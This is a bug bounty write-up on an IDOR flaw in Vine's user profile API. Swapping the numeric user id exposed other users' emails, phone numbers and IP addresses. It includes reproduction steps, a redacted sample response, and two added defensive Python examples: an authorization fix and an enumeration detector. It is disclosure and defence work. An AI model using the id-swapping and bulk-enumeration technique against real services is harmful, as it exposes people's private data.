Vine User's Private Information Disclosure

Prial Islam Khan
Nov 7, 2018 · 3 min read

Hello readers,

This is Prial Islam, a security researcher from Bangladesh. This is an old finding of mine that I am adding to my blog.

Today I will write about a critical IDOR vulnerability leading to information disclosure, which allowed me to get any Vine user's sensitive information, including IP address, phone number and email.

I reported this bug to the Twitter security team through their bug bounty program on HackerOne, and they rewarded me with $7,560 for this report.

$$$$ + Blog post permission 😾 😇

Vine issued a statement regarding this vulnerability in a post on the Vine blog, and HackerOne also mentioned this vulnerability in the HackerOne Zerodaily newsletter.

  • Vulnerable endpoint: https://vine.co/api/users/profiles/<User Id>

When I was testing Vine domains for something interesting, I noticed an endpoint whose response contained all of my account's information. I thought this was normal, as many sites have this type of endpoint that shows the logged-in user's information. So I thought, let's try to exploit this with CORS if it is misconfigured. But a CORS policy was in place. Then I changed the user-id value to a random number and was shocked to find that someone else's user information was in front of me. By changing the user-id value I was able to get any Vine user's full information.
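The bug described above is a missing object-level authorization check: the endpoint authenticates the caller but never relates the `<User Id>` in the URL to the session, so CORS is irrelevant and any logged-in account can read any record. The following is an added example, not Vine's or Twitter's code, showing the vulnerable shape of such a handler beside a hardened one. `PROFILES`, `PUBLIC_FIELDS`, the function names and all sample values are assumptions made for this illustration.

```python
# Added example (not Vine's or Twitter's code): object-level authorization for a
# profile endpoint shaped like /api/users/profiles/<user_id>. PROFILES, the field
# list and the function names are assumptions made for this illustration.

# Fields a non-owner is allowed to see. Using an allow-list means a column added
# to the user table later is hidden by default instead of leaked by default.
PUBLIC_FIELDS = frozenset({
    "userId", "username", "description", "avatarUrl", "followerCount",
    "authoredPostCount", "verified", "private",
})

# Constructed sample profile store keyed by user id (every value is made up).
PROFILES = {
    1001: {"userId": 1001, "username": "alice", "followerCount": 12,
           "verified": 0, "private": 0, "description": "hello",
           "email": "alice@example.invalid", "phoneNumber": "+15550000001",
           "ipAddress": "203.0.113.10", "lastLogin": "2018-11-01T09:00:00"},
    1002: {"userId": 1002, "username": "bob", "followerCount": 7,
           "verified": 1, "private": 0, "description": "hi",
           "email": "bob@example.invalid", "phoneNumber": "+15550000002",
           "ipAddress": "198.51.100.20", "lastLogin": "2018-11-02T18:30:00"},
}


class Unauthorized(Exception):
    """Request carries no valid session."""


class NotFound(Exception):
    """Requested user id does not exist."""


def _load(session_user_id, requested_user_id):
    """Shared authentication and lookup; the authorization decision is separate."""
    if session_user_id is None:
        raise Unauthorized("login required")
    profile = PROFILES.get(requested_user_id)
    if profile is None:
        raise NotFound(requested_user_id)
    return profile


def vulnerable_get_profile(session_user_id, requested_user_id):
    """'Before': authentication is checked, but the id in the URL is never related
    to the session, so any logged-in caller can read any user's full record."""
    return dict(_load(session_user_id, requested_user_id))


def get_profile(session_user_id, requested_user_id):
    """'After': the full record goes only to its owner; everyone else receives the
    allow-listed public projection, so email, phoneNumber and ipAddress never
    leave the server for a foreign user id."""
    profile = _load(session_user_id, requested_user_id)
    if requested_user_id == session_user_id:
        return dict(profile)
    return {k: v for k, v in profile.items() if k in PUBLIC_FIELDS}


if __name__ == "__main__":
    # Alice reading Bob: owner-only fields are absent from the response.
    print(sorted(get_profile(1001, 1002)))
    print("email" in vulnerable_get_profile(1001, 1002))  # True: the IDOR
```

The projection is deliberately an allow-list rather than a list of fields to strip: the leaked response in this write-up contains dozens of keys, and a deny-list has to be updated every time a new one is added, which is exactly how fields like `ipAddress` end up in a public endpoint.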

Reproduce:

  • Choose any user whose information you want to get and collect his User-ID.
  • Now place the User-ID in the endpoint below and visit it. You will get the response in the body.

https://vine.co/api/users/profiles/<User Id>

Response:

{"code": "", "data": {"followerCount": 16271364, "includePromoted": 1, "captchaSucceeded": 0, "recordComment": null, "locale": "iUS", "shareUrl": "https://vine.co/████████", "hiddenPhoneNumber": 0, "notPorn": 0, "userId": █████████, "private": 0, "likeCount": null, "commentCount": null, "platforms": ["android", "ios"], "postCount": null, "profileBackground": "0x33ccbf", "suspended": null, "hiddenFacebook": 0, "verifiedEmail": 0, "explicitContent": 0, "dmcaStrikeCount": 0, "flaggedCount": 7579, "verified": 1, "loopCount": 6132344784,
"avatarUrl": "http://v.cdn.vine.co/r/avatars/████████████████████████████████████████.jpg?versionId=JIjnvXTkbWpjvk7glYZIXDqt187couHr", "authoredPostCount": 598, "review_result_illegal_review": 0, "review_result_ok": 0, "review": null, "suspendedBy": null, "twitterId": ████████, "phoneNumber": "██████████", "location": "Los Angeles California", "notifyActivity": 1, "facebookConnected": 1, "explicitContentAdmin": 0, "statsTags": null, "hiddenEmail": 0, "unflaggable": 0, "username": "████████", "modified": "2017-01-29T01:24:00.000000", "userIdStr": "████████", "twitterIdStr": "████████", "vanityUrls": ["kingbach"], "remixDisabled": 0, "deleted": null, "categories": null, "released": 0, "loopVelocity": null,
"strikeCounts": [{"count": 0, "strikeType": "SEVERE_POLICY_VIOLATION"}, {"count": 0, "strikeType": "DMCA"}, {"count": 0, "strikeType": "SENSITIVE"}, {"count": 0, "strikeType": "POSSIBLY_ILLEGAL"}, {"count": 0, "strikeType": "GRAPHIC_NON_VIOLATING"}, {"count": 0, "strikeType": "ESC"}], "uploadHD": 1, "verifiedPhoneNumber": 1, "hiddenTwitter": 0, "vineVerified": 1, "notifyMessages": 1, "needsPhoneVerification": 0, "repostCount": null, "twitterScreenname": "██████", "secondaryColor": "0x33ccbf", "twitterVerified": 1, "captchaRequired": 0, "edition": null, "acceptsOutOfNetworkConversations": 1, "disableAddressBook": 1, "description": "Instagram/Twitter/Shots/SnapChat- @███ For booking go to the library", "escStrikeCount": 0,
"review_result_explicit": 0, "notificationsLastViewed": "2016-04-26T21:03:35.000000", "email": "████████", "hideFromPopular": 0, "admin": 0, "contentReview": 0, "created": "2013-04-13T19:30:31.000000", "review_result_illegal_confirmed": 0, "followingCount": null, "lastLogin": "2016-12-13T23:29:40.000000", "escUser": 0, "ipAddress": "██████", "twitterConnected": 1}, "success": true, "error": ""}

Take a closer look at the response and you will find a lot of private information about the user [all such information was redacted by Twitter security, as it belongs to other users]. Some of the fields are:

"platforms": ["android", "ios"]
"flaggedCount": 7579
"twitterId": "█████████"
"phoneNumber": "█████"
"location": "Los Angeles California"
"modified": "2017-01-29T01:24:00.000000"
"notificationsLastViewed": "2016-04-26T21:03:35.000000"
"email": "█████████"
"created": "2013-04-13T19:30:31.000000"
"lastLogin": "2016-12-13T23:29:40.000000"
"ipAddress": "█████"

Here even ipAddress, email and phone number are disclosed. An attacker could use this information for malicious attacks on any Vine user, and because the user ids are plain numbers, could dump the information of every user.
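Because the endpoint takes a numeric id, a full dump looks like one session walking through consecutive profile ids far faster than any real user browses. The following is an added example, not Vine's or Twitter's code, of how a defender can find that pattern in access logs after the fact; the log line format, the session ids and every timestamp are constructed for this illustration, and the thresholds are assumptions.

```python
# Added example (not Vine's or Twitter's code): spotting bulk profile enumeration
# in access logs. The line format "<ts> sess=<id> GET /api/users/profiles/<uid> <status>"
# and all sample data below are constructed for this illustration.
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\S+) sess=(?P<sess>\S+) GET /api/users/profiles/(?P<uid>\d+) (?P<status>\d{3})$"
)
TS_FMT = "%Y-%m-%dT%H:%M:%SZ"


def _constructed_log():
    """Build sample lines: session 'bot' walks 30 consecutive ids in two minutes,
    session 'alice' reads her own profile and two friends over the same period."""
    base = datetime(2018, 11, 7, 10, 0, 0)
    lines = []
    for i in range(30):
        ts = (base + timedelta(seconds=4 * i)).strftime(TS_FMT)
        lines.append(f"{ts} sess=bot GET /api/users/profiles/{1001 + i} 200")
    for i, uid in enumerate((1001, 1001, 1042, 1001, 1077)):
        ts = (base + timedelta(seconds=25 * i)).strftime(TS_FMT)
        lines.append(f"{ts} sess=alice GET /api/users/profiles/{uid} 200")
    return lines


SAMPLE_LOG = _constructed_log()


def parse_line(line):
    """Return (timestamp, session, user_id) for a profile request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return datetime.strptime(m["ts"], TS_FMT), m["sess"], int(m["uid"])


def _events_by_session(lines):
    events = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            ts, sess, uid = parsed
            events[sess].append((ts, uid))
    for evs in events.values():
        evs.sort()
    return events


def distinct_profiles_in_window(lines, window=timedelta(minutes=5)):
    """Per session: the largest number of distinct profile ids fetched within any
    sliding window of the given length (a user reading a few friends stays low)."""
    peak = {}
    for sess, evs in _events_by_session(lines).items():
        start, best = 0, 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1
            best = max(best, len({uid for _, uid in evs[start:end + 1]}))
        peak[sess] = best
    return peak


def longest_sequential_run(lines):
    """Per session: longest run of requests whose ids increase by exactly one,
    the signature of a loop over numeric ids rather than of normal browsing."""
    runs = {}
    for sess, evs in _events_by_session(lines).items():
        best = run = 1
        for (_, prev), (_, cur) in zip(evs, evs[1:]):
            run = run + 1 if cur == prev + 1 else 1
            best = max(best, run)
        runs[sess] = best
    return runs


def flag_enumerators(lines, max_distinct=10, window=timedelta(minutes=5)):
    """Sessions that fetched more than max_distinct distinct profiles in one window."""
    peaks = distinct_profiles_in_window(lines, window)
    return sorted(sess for sess, n in peaks.items() if n > max_distinct)


if __name__ == "__main__":
    print(distinct_profiles_in_window(SAMPLE_LOG))
    print(longest_sequential_run(SAMPLE_LOG))
    print(flag_enumerators(SAMPLE_LOG))
```

The two signals complement each other: the distinct-id count catches any bulk reader regardless of id order, while the sequential-run length separates a scripted walk from a legitimately busy client such as a feed that loads many unrelated profiles at once.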

This also affects Twitter users, as Vine users can log in to Vine services with their Twitter account. I found the same vulnerability on another bug bounty program, Edmodo's website.

Thanks for reading. Happy hunting.

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Written by Prial Islam Khan

A teenage boy with a passion for breaking security.
